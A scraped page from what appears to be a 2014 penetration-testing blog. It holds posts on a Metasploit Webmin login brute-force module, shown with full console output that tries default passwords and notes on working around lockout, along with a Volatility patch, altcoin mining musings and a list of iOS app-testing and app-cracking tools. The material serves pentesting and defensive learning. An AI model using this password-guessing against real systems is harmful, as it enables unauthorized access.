just sticking this here so i can find it later. thanks @mubix
cat hosts.txt | xargs -t -I subdomain dig +noall subdomain.THEDOMAIN.com +answer
update, rob pointed me to his post on it
carnal0wnage [Shared Reader]
Tuesday, March 25, 2014
Wednesday, March 12, 2014
So i ran across a bunch of webmin boxes on a pentest. I went to just go try http_login or some other spiffy Metasploit auxiliary module but nothing was working quite right. I ended up needing to write my own because i had about 60+ hosts to check and that just tedious enough to make you write code and not manually do it.
At least one gotcha i discovered is that webmin will block the IP after four or five (usually 5) attempts. I believe the default is 300 seconds it will also supposedly increase the delay if the same host keeps hitting it.
I took the approach to throw 5 passwords at it, if its not something super obvious then i'd move along. maybe not the best solution but i wanted to make sure it wasn't root/root or webmin/webmin and move on.
msf auxiliary(webmin_login_brute) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
smsf auxiliary(webmin_login_brute) > set RPORT 10000
RPORT => 10000
smsf auxiliary(webmin_login_brute) > set SSL TRUE
SSL => TRUE
msf auxiliary(webmin_login_brute) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
setmsf auxiliary(webmin_login_brute) > set USER_AS_PASS false
USER_AS_PASS => false
set msf auxiliary(webmin_login_brute) > set USERNAME root
USERNAME => root
msf auxiliary(webmin_login_brute) > set PASS_FILE /root/.msf4/data/wordlists/webmin_defaults.txt
PASS_FILE => /root/.msf4/data/wordlists/webmin_defaults.txt
msf auxiliary(webmin_login_brute) > run
[*] Verifying login exists at http://192.168.1.1:10000/session_login.cgi
[*] http://192.168.1.1:10000/session_login.cgi - Webmin - Attempting authentication
[*] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root'
[-] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'
[-] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password'
[*] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] Scanned 1 of 1 hosts (100% complete)
[*] Verifying login exists at http://10.0.0.25:12321/session_login.cgi
** note you have to unset the PASSWORD value too, for some reason its populating with a blank password and trying that which sucks if you only have five chances.
Code is here
figured i'd let the blog serve as way to let people test prior to doing a pull request.
Posted by CG at 8:00 AM
Thursday, February 20, 2014
Colin and I were working on an memory image the other day and needed to find DLLs loaded by svchost.exe. We turned to everyone's default memory analysis tool Volatility. Volatility doesn't really give you a good option to search for loaded dlls by process name. You can specify a pid to do this, but when you have many processes that have the same name (ie svchost.exe) you can end up with a nasty command like this to do the trick.
This really wasn't working for us so we took a look at Volatility's source code and made some small adjustments. We modified the taskmods.py module that ultimately affects the dlllist module. Normally if you select dlllist plugin with the -h option it gives you various options you can use such as an offset or a pid as seen below:
Now we can simply give it the svchost.exe process by name and get a list of loaded DLL's by processes running by that name. If you have a non-standard svchost.exe process running then this will pick it up as well, but that situation might also help identify a compromise :)
So executing volatility with the following command
vol.py -f 7re-912d4ad7.vmem --profile Win7SP1x64 dlllist -n svchost.exe now gives an output of:
To install it just replace the taskmods.py from your $VOLATILITYHOME/volatility/plugins directory with our taskmods.py.
We have tested it on volatility 2.2, 2.3, 2.3.1 on XP and Windows 7 with no problems.
Posted by gideon at 10:37 AM
Thursday, January 2, 2014
Well maybe not Gold...but Litecoins, hobonickels, dodgecoins, and other kinds of *coins*
We've all heard about Bitcoins (BTC) and all wish we had bought a few hundred 2 years ago so we could retire today but who knew...
We'll its too late to get in the bitcoin game due to the difficultiy of mining one being super high but thankfully 60+ alternate crypto currencies have sprung up and thanks to sites like www.cryptsy.com you can now trade those alternate currencies for BTC.
want to know what to mine? you can check out http://www.coinwarz.com/cryptocurrency or http://www.coinarmy.com/
Punch in the numbers for your SHA256/scrypt cracking ability and get an idea what to mine to make the most $$$ the fastest. so if you can do 300 KH/s (average cheap GPU)
in 166 days you can make one Bitcoin (BTC) mining Netcoins and exchanging them at current rate where it would take more like 2000 days to make a Bitcoin.
OMG its raining money! sort of.
anyway its neat. seems like a good reason to set up a build a hash cracker, write it off for security stuff, and have it mining when its not busy converting hashes into plaintext.
Couple articles on it:
Solo Mining vs Pools
Hardware comparison to get an idea what numbers to put into those crunchers.
You can even buy a 6 graphic card motherboard for mining, stock trading or making everyone (well your geek homies) jealous
From a hacker shit perspective... i cant image the mining pool software is very good. its probably worth taking a look at it. :-)
Saturday, December 28, 2013
Now that you have your shiny new Evasion7 jailbreak running it's time to set up the environment for application testing!
Arming your iDevice with *nix tools
Take this list and dump it to a file (packages.txt) and run:
Tunnel ports over USB (enable SSH without network using localhost:2222)
Library. Custom implementation of iTunes type connections, file-system access, system access.
Monitor realtime iOS file system
Audits data protection of files
Read cookies.binarycookies files
lsof ARM Binary
list of all open files and the processes that opened them
lsock ARM Binary
monitor socket connections
Disables ASLR of an application
Application Cracker compiled (remove encryption)
Application Cracker (BASH GDB Wrapper)
Then you just have to MitM the web traffic. There are plenty of guides on that around the net.
If you have other tools you use in your app assessment setup we'd love to hear about it. Feel free to leave suggestions in the comments.
Posted by Jhaddix at 2:57 AM
Thursday, December 26, 2013
I've been here....work has kept me super busy...pretty sure there is a post in 2012 that says about the same. :-/
I attempted to recruit some smart people to make some posts and they did so thanks to all the guest bloggers this year.
so what's been up?
well I've taken on two hobbies that don't directly tie into this blog. One, Christmas lights, like the obnoxious programmables RGB color ones. Facebook friends have been kept abreast of the situation. Two, stock trading...which i found out a fair number of hackers are into...which is cool. The stock stuff came about from reading the Rich Dad Poor Dad book and trying to figure out a way not to have to work until i die. See that post for a tiny bit more explanation.
I've been told by a few people that readers would probably find the xmas light stuff interesting as it does involve cat-5 cables and packets over Ethernet frames. So I'll start knowledge dumping in Jan on that topic.
anyway. Tech stuff....whats up?
Shitty passwords are whats up this year (totally new issue right??!!!). I didn't go back and count but a large majority of the tests I performed or assisted with this year where there was some sort of single factor login portal (SSLVPN, Citrix, OWA, etc) fell over to one of the following:
Lares continues to break into hard to break into places using Red Teaming.
I also gave a talk at a credit union conference a few months ago where i tried to sum up how organizations are getting owned. TLDR; its all stuff we know about, but it takes work to fix, so not that many organizations do it.
I've been kind of a deadbeat on talking in 2013 but i have a few ideas on some talks for 2014, ideally blog posts either here or the Lares blog will help me work those ideas into posts and eventually into a slide deck(s).
Monday, December 23, 2013
So first of a few end of year posts...
Best non-technical book i read this year was Rich Dad Poor Dad
Assets make you money, liabilities cost you money. To build wealth you need to accumulate assets.